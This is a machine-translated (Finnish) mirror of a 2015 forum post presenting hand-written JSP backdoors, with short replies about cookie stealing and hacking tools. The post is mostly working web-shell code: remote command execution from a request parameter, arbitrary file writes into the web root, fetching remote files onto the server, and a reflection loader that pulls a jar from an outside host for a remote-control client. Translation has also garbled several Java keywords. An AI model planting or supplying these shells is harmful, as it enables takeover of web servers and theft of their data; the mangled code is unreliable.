Tämä artikkeli on konekäännöksen peiliartikkeli, klikkaa tästä siirtyäksesi alkuperäiseen artikkeliin.

Näkymä: 14991|Vastaus: 7

[Turvatyökalut] Käsinkirjoitettu JSP:n takaovi

[Kopioi linkki]
Julkaistu 2.1.2015 18.46.57 | | | |
Siirretty: http://p2j.cn/?p=1627
1. Suorita järjestelmäkomennot:
Suorita järjestelmäkomennot ilman kaikua:
<%Runtime.getRuntime().exec(request.getParameter("i"));%>
Pyyntö: http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls
Suorituksen jälkeen ei kuulu kaikua, mikä on erittäin kätevää pomppukuorille.
Salasanan varmistuksessa on kaikuja:
<% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();        int a = -1;        tavu[] b = uusi tavu[2048];        out.print("<pre>");        while((a=in.read(b))!=-1){ out.println(new String(b));        } out.print("</pre>");    }%>
Pyyntö: http://192.168.16.240:8080/Shell/cmd2.jsp?pwd=023&i=ls

2. Koodaa merkkijono ja kirjoita se määritettyyn tiedostoon:
1:
<%new java.io.FileOutputStream(request.getParameter("f")).write(request.getParameter("c").getBytes());%>
Pyyntö: http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
Kirjoita web-hakemistoon:
<%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(request.getParameter("c").getBytes();%>
Pyyntö: http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
2:
<%new java.io.RandomAccessFile(request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
Pyyntö: http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
Kirjoita web-hakemistoon:
<%new java.io.RandomAccessFile(application.getRealPath("/")+"/"+request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
Pyyntö: http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
3: Lataa etätiedosto (jos et käytä Apache io -sovelluksia, et voi muuntaa syötevirtaa tavuksi, joten se on hyvin pitkä...)
<% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream();    tavu[] b = uusi tavu[1024];    java.io.ByteArrayOutputStream baos = uusi java.io.ByteArrayOutputStream();    int a = -1;    kun ((a = in.read(b)) != -1) { baos.write(b, 0, a);    } new java.io.FileOutputStream(request.getParameter("f")).write(baos.toByteArray()); %>
Pyyntö: http://localhost:8080/Shell/download.jsp?f=/Users/yz/wwwroot/1.png&u=http://www.baidu.com/img/bdlogo.png
Lataa verkkopolkuun:
<% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream();    tavu[] b = uusi tavu[1024];    java.io.ByteArrayOutputStream baos = uusi java.io.ByteArrayOutputStream();    int a = -1;    kun ((a = in.read(b)) != -1) { baos.write(b, 0, a);    } new java.io.FileOutputStream(application.getRealPath("/")+"/"+ request.getParameter("f")).write(baos.toByteArray()); %>
Pyyntö: http://localhost:8080/Shell/download.jsp?f=1.png&u=http://www.baidu.com/img/bdlogo.png
Neljä: Heijastus kutsuu ulkoista purkkia, täydellistä takaporttia
Jos et pidä yllä olevasta takaoven toiminnosta, joka on liian heikko ja vanhentunut, voit kokeilla tätä:
<%=Class.forName("Load",true,new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(request.getParameter("u"))})).getMethods()[0].invoke(null, new Object[]{ request.getParameterMap()})%>
Pyyntö: http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar&023=A

Keittiöveitsen liitäntä: http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar, salasana 023.

Ratkaisu:
Käytä heijastusta ulkoisen jardin lataamiseen nykyiseen sovellukseen, ja heijastus suorittaa tulostuskäsittelyn. request.getParameterMap() sisältää kaikki pyydetyt parametrit. Koska ulkoinen jar-paketti on ladattu, palvelimen on pystyttävä käyttämään tätä jar-osoitetta.




Edellinen:TXT-tekstitiedoston taustalla oleva kriisi
Seuraava:Java MD5 -salaus, Base64-salaus ja purku Java suorittaa järjestelmäkomentolähdekoodia
Julkaistu 2.1.2015 20.17.30 |
Oletko viime aikoina tutkinut JSP:n takaporttia?
 Vuokraisäntä| Julkaistu 2.1.2015 20.39.44 |
admin julkaistu 2015-1-2 klo 20:17
Oletko viime aikoina tutkinut JSP:n takaporttia?

Oletko koskaan nähnyt JSP:n yhdellä lauseella? Löysin sen, en tutkinut sitä syvällisesti, en ymmärtänyt xss:ää, sain vihdoin keksit eilen, enkä tiedä miten muokata evästeiden latausta
Julkaistu 2.1.2015 20.44.40 |
Delver_Si Julkaistu 2015-1-2 klo 20:39
Oletko koskaan nähnyt JSP:n yhdellä lauseella? Löysin sen, en kaivanut syvemmälle, en ymmärtänyt xss:ää, sain vihdoin keksit eilen, en tiedä miten muokata keittoa...

Se ei ole minun keksejäni, jotka varastetaan henkilökohtaisella allekirjoitustiedostolla,,,

Käytä Firefoxin HackBar-lisäosaa
Julkaistu 2.1.2015 20.48.57 |
Delver_Si Julkaistu 2015-1-2 klo 20:39
Oletko koskaan nähnyt JSP:n yhdellä lauseella? Löysin sen, en kaivanut syvemmälle, en ymmärtänyt xss:ää, sain vihdoin keksit eilen, en tiedä miten muokata keittoa...

Ghost Brother Monitoimiselain v1.0


鬼哥多功能浏览器v1.0.exe (72 KB, Latausten määrä: 7, Myyntihinta: 1 Grain MB)
 Vuokraisäntä| Julkaistu 2.1.2015 20.57.50 |
ylläpitäjä julkaistu 2015-1-2 klo 20:44
Se ei ole minun keksejäni, jotka varastetaan henkilökohtaisella allekirjoitustiedostolla,,,

Käytä Firefoxin HackBar-lisäosaa

Eilen vapaa ovi kouristeli, enkä saanut yhteyttä enkä päässyt Firefoxin kauppaan.
 Vuokraisäntä| Julkaistu 2.1.2015 20.59.01 |
ylläpitäjä julkaistu 2015-1-2 klo 20:44
Se ei ole minun keksejäni, jotka varastetaan henkilökohtaisella allekirjoitustiedostolla,,,

Käytä Firefoxin HackBar-lisäosaa

DZ:llä ei ole tätä porsaanreikää
Julkaistu 2.1.2015 21.00.22 |
Delver_Si Julkaistu 2015-1-2 klo 20:59
DZ:llä ei ole tätä porsaanreikää

En tiedä, voit testata sitä, älä sotke tietokantaani   

Me kaikki käytämme Tor-selainta kiertääksemme seinän

Vastuuvapauslauseke:
Kaikki Code Farmer Networkin julkaisemat ohjelmistot, ohjelmamateriaalit tai artikkelit ovat tarkoitettu vain oppimis- ja tutkimustarkoituksiin; Yllä mainittua sisältöä ei saa käyttää kaupallisiin tai laittomiin tarkoituksiin, muuten käyttäjät joutuvat kantamaan kaikki seuraukset. Tämän sivuston tiedot ovat peräisin internetistä, eikä tekijänoikeuskiistat liity tähän sivustoon. Sinun tulee poistaa yllä oleva sisältö kokonaan tietokoneeltasi 24 tunnin kuluessa lataamisesta. Jos pidät ohjelmasta, tue aitoa ohjelmistoa, osta rekisteröityminen ja hanki parempia aitoja palveluita. Jos rikkomuksia ilmenee, ota meihin yhteyttä sähköpostitse.

Mail To:help@itsvse.com